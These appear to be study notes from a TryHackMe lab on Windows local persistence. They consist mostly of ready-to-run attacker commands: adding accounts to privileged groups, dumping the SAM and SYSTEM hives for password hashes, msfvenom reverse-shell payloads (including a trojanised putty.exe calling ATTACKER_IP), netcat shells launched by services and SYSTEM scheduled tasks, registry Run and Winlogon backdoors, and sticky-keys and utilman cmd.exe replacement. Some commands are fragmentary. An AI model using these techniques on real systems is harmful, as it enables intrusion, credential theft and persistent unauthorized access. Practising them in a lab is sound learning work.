Skip to content

Local Persistence

(LP1) - Tampering With Unprivileged Accounts

Assign Group Memberships 1

  • add unprivileged user to "Administrators" group
    net localgroup administrators thmuser0 /add

Assign Group Memberships 2

  • add unprivileged user to "Backup Operators" group
  • add unprivileged user to "Remote Desktop Users" group
  • enable "Backup Operators" group
    net localgroup "Backup Operators" thmuser1 /add
    net localgroup "Remote Desktop Users" thmuser1 /add
    net localgroup "Remote Management Users" thmuser1 /add
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
  • connect via evil-winrm
  • dump content of the SAM and SYSTEM registry hives
    evil-winrm -i -u thmuser1 -p Password321
    reg save hklm\system system.bak
    reg save hklm\sam sam.bak
    download system.bak
    download sam.bak
  • get user hashes
    /opt/impacket/examples/ -sam sam.bak -system system.bak LOCAL

Special Privileges and Security Descriptors

  • assign privileges to user
    • SeBackupPrivilege: The user can read any file in the system, ignoring any DACL in place.
    • SeRestorePrivilege: The user can write any file in the system, ignoring any DACL in place.
  • export the current configuration of user perminision
    secedit /export /cfg config.inf
  • edit file and add user
    SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551,thmuser2
    SeRestorePrivilege = *S-1-5-32-544,*S-1-5-32-551,thmuser2
  • We finally convert the .inf file into a .sdb file which is then used to load the configuration back into the system
    secedit /import /cfg config.inf /db config.sdb
    secedit /configure /db config.sdb /cfg config.inf
  • You should now have a user with equivalent privileges to any Backup Operator
  • To open the configuration window for WinRM's security descriptor, you can use the following command in Powershell (you'll need to use the GUI session for this):
Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI

This will open a window where you can add thmuser2 and assign it full privileges to connect to WinRM

RID Hijacking


(LP2) - Backdooring Files

Executable files

msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=ATTACKER_IP lport=4444 -b "\x00" -f exe -o puttyX.exe

Shortcut Files


Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe 4445"
Link Target
powershell.exe -WindowStyle hidden C:\Windows\System32\calc-backdoor.ps1

Hijacking File Associations


(LP3) - Abusing Services

Creating backdoor services

create backdoor service

msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=4444 -f exe-service -o rev-svc.exe
run that service on windows
sc.exe create THMservice2 binPath= "C:\windows\rev-svc.exe" start= auto
sc.exe start THMservice2

(LP4) - Abusing Scheduled Tasks

Createn new task

create task

schtasks /create /sc minute /mo 1 /tn THM-TaskBackdoor /tr "c:\tools\nc64 -e cmd.exe 4449" /ru SYSTEM
confirm creation
schtasks /query /tn thm-taskbackdoor

(LP5) - Logon Triggered Persistence

Startup folder

  • drop backdoor into Startup folder
    • C:\Users\<your_username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
    • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
      msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=4450 -f exe -o revshell.exe

Run / RunOnce

  • You can also force a user to execute a program on logon via the registry.
    • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    • HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
    • HKLM\Software\Microsoft\Windows\CurrentVersion\Run
    • HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
  • Let's then create a REG_EXPAND_SZ registry entry under
    • with MyBackdoor name
    • with C:\Windows\backdoor.exe value


Another alternative to automatically start programs on logon is abusing Winlogon, the Windows component that loads your user profile right after authentication (amongst other things).

Winlogon uses some registry keys under HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ that could be interesting to gain persistence Edit Userinit record - New value = C:\Windows\system32\userinit.exe, C:\Users\Administrator\Downloads\rev-svc6.exe

Logon scripts

  • crente new record under Computer\HKEY_CURRENT_USER\Environment
  • Let's then create a REG_EXPAND_SZ registry entry under
    • with UserInitMprLogonScript name
    • with C:\Windows\backdoor.exe value

(LP6) - Backdooring the Login Screen / RDP

Sticky Keys

takeown /f c:\Windows\System32\sethc.exe
icacls C:\Windows\System32\sethc.exe /grant Administrator:F
copy c:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
- now, after pressing SHIFT 5 times on lock screen, Windows will execute the binary cmd.exe


Utilman is a built-in Windows application used to provide Ease of Access options during the lock screen.

takeown /f c:\Windows\System32\utilman.exe

icacls C:\Windows\System32\utilman.exe /grant Administrator:F

copy c:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe